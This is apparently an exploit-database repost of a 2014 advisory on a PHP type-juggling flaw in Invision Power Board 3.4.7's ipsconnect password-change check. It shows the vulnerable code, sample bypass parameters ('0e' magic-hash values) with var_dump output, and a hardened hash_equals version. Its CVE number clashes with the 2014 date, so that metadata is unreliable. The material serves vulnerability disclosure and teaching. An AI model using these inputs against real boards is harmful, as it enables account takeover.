Invision Power Board <= 3.4.7 password change

CVE: CVE-2021-28130
Category: CWE-287
Price: N/A
Severity: High
Author: Jinson Varghese Behanan
Risk: High
Exploitation Type: Remote
Date: 2014-11-25
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2014110173

Below is a copy:

# Exploit Title: Invision Power Board <= 3.4.7 password change
# Date: 25.11.2014
# Exploit Author: ZeroDay
# Software Link: http://www.invisionpower.com/
# Version: <= 3.4.7
# Tested on: 3.4.7
# About: For the G-Owl with Love

vuln code
interface/ipsconnect/ipsconnect.php

public function change( $id, $key, $username, $displayname, $email, $md5Password, $redirect, $redirectHash )
{
    if ( $key != md5( $this->masterKey . $id ) )
    {
        $this->_return( base64_encode( $this->settings['board_url'] ), array( 'status' => 'BAD_KEY' ) );
    }

    $member = IPSMember::load( intval( $id ), 'none', 'id' );
    if ( !$member['member_id'] )
    {
        $this->_return( $redirect, array( 'status' => 'NO_USER' ) );
    }
    ...

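The line if ( $key != md5( $this->masterKey . $id ) ) uses the loose comparison !=, which is incorrect here: when both operands are numeric-looking strings such as "0e...", PHP compares them as numbers, so two different strings can be treated as equal.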

If the $this->masterKey variable is "1234", then, to pass the comparison check successfully, we will have to send the POST parameters: id=1x5306758&key=0e123 - where "1x" is the user_id.

var_dump(intval('1x5306758')); //int(1)
var_dump(md5('1234'.'1x5306758')); //string(32) "0e206089892480803868366430752394"
var_dump('0e123' == md5('1234'.'1x5306758')); //bool(true)

BUT! Since we do not know the value of the $this->masterKey variable, the only things we can hope for are brute force and luck ;)
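
A hardened form of the key check next to the loose one described above, as an added example that is not part of the original advisory or of IP.Board's own code. The function names keyOkLoose and keyOkStrict are hypothetical, and the inputs are the sample values quoted in the advisory.

```php
<?php
// Added example; function names are hypothetical, not IP.Board's.

// Same shape as the advisory's check: != compares two numeric-looking
// strings as numbers, so a pair of "0e<digits>" strings is treated as equal.
function keyOkLoose(string $masterKey, string $id, string $key): bool
{
    return !($key != md5($masterKey . $id));
}

// Hardened form of the same check.
function keyOkStrict(string $masterKey, string $id, string $key): bool
{
    // The id must be decimal digits only, so the value that was hashed is
    // the same value intval() later uses to load the member.
    if (!ctype_digit($id)) {
        return false;
    }
    // An MD5 hex digest from md5() is exactly 32 lowercase hex characters.
    if (preg_match('/\A[0-9a-f]{32}\z/', $key) !== 1) {
        return false;
    }
    // hash_equals() compares bytes in constant time, with no type juggling.
    return hash_equals(md5($masterKey . $id), $key);
}

// Sample values taken from the advisory ("1234" is its example master key).
$masterKey = '1234';
$id        = '1x5306758';
$key       = '0e123';

var_dump(keyOkLoose($masterKey, $id, $key));   // loose check on the advisory's input
var_dump(keyOkStrict($masterKey, $id, $key));  // hardened check on the same input

// A well-formed request (digits-only id, full digest) passes the hardened check.
$goodId = '1';
var_dump(keyOkStrict($masterKey, $goodId, md5($masterKey . $goodId)));
```

The strict operator !== would also stop the numeric comparison; hash_equals() additionally avoids leaking how many leading characters of the digest matched.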